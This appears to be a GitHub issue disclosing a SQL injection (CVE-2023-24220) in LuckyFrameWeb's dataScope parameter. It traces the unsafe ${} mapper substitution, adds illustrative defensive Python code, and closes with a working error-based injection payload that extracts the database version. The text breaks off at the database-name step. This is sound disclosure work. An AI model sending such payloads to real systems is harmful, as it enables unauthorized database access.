CVE-2023-24220: sql inject 1 · Issue #22 · seagull1985/LuckyFrameWeb
LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/RoleMapper.xml.
src/main/resources/mybatis/system/RoleMapper.xml
There is a ${} substitution in this mapper. Unlike #{}, which binds the value as a prepared-statement parameter, ${} splices the raw string into the SQL text:
<if test="deptId != null and deptId != 0">
    AND (u.dept_id = #{deptId} OR u.dept_id IN ( SELECT t.dept_id FROM sys_dept t WHERE FIND_IN_SET (#{deptId},ancestors) ))
</if>
<!-- data scope filter -->
${params.dataScope}
</select>
Search for selectUserList to see where this select id is used:
Query user information:
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java
Follow up the selectUserList method to see the specific implementation:
src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java
The parameters in the User object are passed into the mapper for the SQL operation. Because params.dataScope is controllable by the requester (it is bound from the params[dataScope] request parameter) and is substituted into the statement via ${}, the injection follows.
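As an added illustration (not code from the LuckyFrameWeb project), the following shows the defensive pattern that removes this class of bug: the data-scope fragment is never taken from request parameters, but is built server-side from integer department ids derived from the caller's roles, while deptId stays a bound parameter. The table layout and FIND_IN_SET emulation (a LIKE over the ancestors column) are assumptions so the example runs on sqlite3.

```python
import sqlite3

# Constructed demo schema mirroring the two tables the mapper queries.
DEMO_SCHEMA = """
CREATE TABLE sys_dept (dept_id INTEGER PRIMARY KEY, ancestors TEXT);
CREATE TABLE sys_user (user_id INTEGER PRIMARY KEY, dept_id INTEGER, user_name TEXT);
INSERT INTO sys_dept VALUES (100, '0'), (101, '0,100'), (102, '0,100,101'), (200, '0');
INSERT INTO sys_user VALUES (1, 101, 'alice'), (2, 102, 'bob'), (3, 200, 'carol');
"""


def new_demo_conn():
    conn = sqlite3.connect(":memory:")
    conn.executescript(DEMO_SCHEMA)
    return conn


def build_data_scope(allowed_dept_ids):
    """Server-side replacement for ${params.dataScope}. Only integers that the
    server itself derived from the caller's roles ever reach the SQL text."""
    ids = []
    for d in allowed_dept_ids:
        if not isinstance(d, int) or isinstance(d, bool):
            raise ValueError(f"dept id must be an int, got {d!r}")
        ids.append(str(d))
    if not ids:
        return " AND 1 = 0"  # no visible departments: empty result, not the whole table
    return " AND u.dept_id IN (" + ",".join(ids) + ")"


def select_user_list(conn, request_params, allowed_dept_ids, dept_id=None):
    """Hardened selectUserList: anything under request_params['dataScope'] is
    ignored; deptId is bound as a parameter, exactly as #{deptId} would be."""
    sql = "SELECT u.user_id, u.user_name FROM sys_user u WHERE 1 = 1"
    args = []
    if dept_id:
        # FIND_IN_SET(deptId, ancestors) emulated for sqlite with a LIKE pattern.
        sql += (" AND (u.dept_id = ? OR u.dept_id IN (SELECT t.dept_id FROM sys_dept t"
                " WHERE (',' || t.ancestors || ',') LIKE '%,' || ? || ',%'))")
        args += [dept_id, str(dept_id)]
    sql += build_data_scope(allowed_dept_ids)  # request_params never touches sql
    return conn.execute(sql, args).fetchall()
```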
Verification:
Construct the URL and parameters according to the code:
Use error-based injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
Select database name: